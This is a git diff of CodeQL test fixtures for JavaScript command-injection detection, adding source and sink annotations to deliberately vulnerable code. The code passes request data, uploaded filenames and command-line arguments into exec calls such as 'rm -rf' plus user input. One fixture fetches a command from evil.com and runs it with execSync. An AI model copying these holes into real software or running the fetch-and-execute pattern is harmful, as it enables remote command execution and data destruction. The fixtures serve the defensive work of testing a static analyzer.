a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -15,6 +15,6 @@ function execEach(commands) { }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 0efc3279cf50..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) { }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { + req.files.forEach(file => { // $ Source exec("touch " + file.originalname); // $ Alert }) }); @@ -21,7 +21,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source exec("touch " + filename); // $ Alert }); req.pipe(busboy); @@ -32,12 +32,12 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { + form.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { + form2.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); }); @@ -49,13 +49,13 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { + form.parse(req, function (err, fields, files) { // $ Source exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field + form2.on('part', function (part) { // $ Source - / file / field exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index a606c9166175..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,7 +2,7 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source require("cross-spawn").sync(cmd); // $ Alert require("execa").shell(cmd); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index 16d91a4f6599..deb426291d6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { + res.on("data", command => { // $ Source cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 74301997e38c..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -9,6 +9,6 @@ function test(e) { exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index fd1e9cdd9f97..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -7,7 +7,7 @@ var cp = require("child_process"); cp.exec("cmd.sh " + process.argv[1]); cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); + var args = process.argv.slice(2); // $ Source cp.execSync(args[0]); // $ Alert cp.execSync("cmd.sh " + args[0]); // $ Alert @@ -21,7 +21,7 @@ var cp = require("child_process"); }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert @@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source cp.exec("cmd.sh " + args); // $ Alert @@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, @@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; + var {...taint3} = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; + var [...taint4] = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert @@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); + var flags = args.parse(process.argv); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); + var flags = require('arg')({...spec}); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert }) @@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); + const options = commandLineArgs(optionDefinitions); // $ Source cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); @@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index 16ace6a020f6..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,14 +3,14 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; + const remote = req.query.remote; // $ Source execFile("git", ["ls-remote", remote]); // $ Alert execFile("git", ["fetch", remote]); // $ Alert indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source execFile("git", myArgs); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 5b58e1afe4f2..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 77f49ad77017..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,44 +1,44 @@ var cp = require("child_process") -module.exports.blah = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile(name, [name]); cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // $ Alert + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // $ Alert + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // $ Alert + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec("rm -rf " + notASource); } @@ -46,41 +46,41 @@ class Cla3 { module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // $ Alert +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // $ Alert +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // $ Alert + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // $ Alert + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // $ Alert + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // $ Alert + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // $ Alert + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // $ Alert + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; args1.push(name); // $ Alert @@ -94,7 +94,7 @@ module.exports.arrays = function (name) { } var util = require("util"); -module.exports.format = function (name) { +module.exports.format = function (name) { // $ Source cp.exec(util.format("rm -rf %s", name)); // $ Alert cp.exec(util.format("rm -rf '%s'", name)); // $ Alert @@ -108,8 +108,8 @@ module.exports.format = function (name) { cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; @@ -117,8 +117,8 @@ module.exports.valid = function (name) { cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; @@ -127,8 +127,8 @@ module.exports.safe = function (name) { } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // $ Alert + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // $ Alert +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; // $ Alert + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', @@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { +module.exports.cmd = function (command, name) { // $ Source cp.exec("fo | " + command); - cp.exec("fo | " + name); // $ Alert + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert - cp.exec("rm -rf " + broken); // $ Alert + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink return; } cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -245,27 +245,27 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // $ Alert + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // $ Alert +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; @@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) { } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // $ Alert + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // $ Alert + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } @@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -336,8 +336,8 @@ module.exports.unproblematic = function() { cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // $ Alert +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { @@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) { } }; -function boundProblem(safe, unsafe) { +function boundProblem(safe, unsafe) { // $ Source cp.exec("rm -rf " + safe); - cp.exec("rm -rf " + unsafe); // $ Alert + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); cp.exec("rm -rf " + sanitized); @@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) { const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert @@ -438,13 +438,13 @@ function build(first, last) { }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // $ Alert +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // $ Alert + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports.check = function check(config) { +module.exports.check = function check(config) { // $ Source const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // $ Alert +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // $ Alert + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); @@ -506,48 +506,48 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { cp.spawn(cmd, args, spawnOpts); // $ Alert } @@ -555,28 +555,28 @@ module.exports.shellThing = function (name) { indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { cp.exec("rm -rf " + name); @@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) { } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,8 +605,8 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { cp.exec("rm -rf " + name); @@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) { if (moreIndirect(name) !== false) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert - cp.exec("rm -rf " + sanitized); // $ Alert +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" cp.exec("rm -rf " + sanitized); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index 6dc040fd7800..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index df2b9bd82e60..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index ba4bd7089693..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { +module.exports.arrToShell = function (cmd, arr) { // $ Source cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index f2e6b7672f89..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git 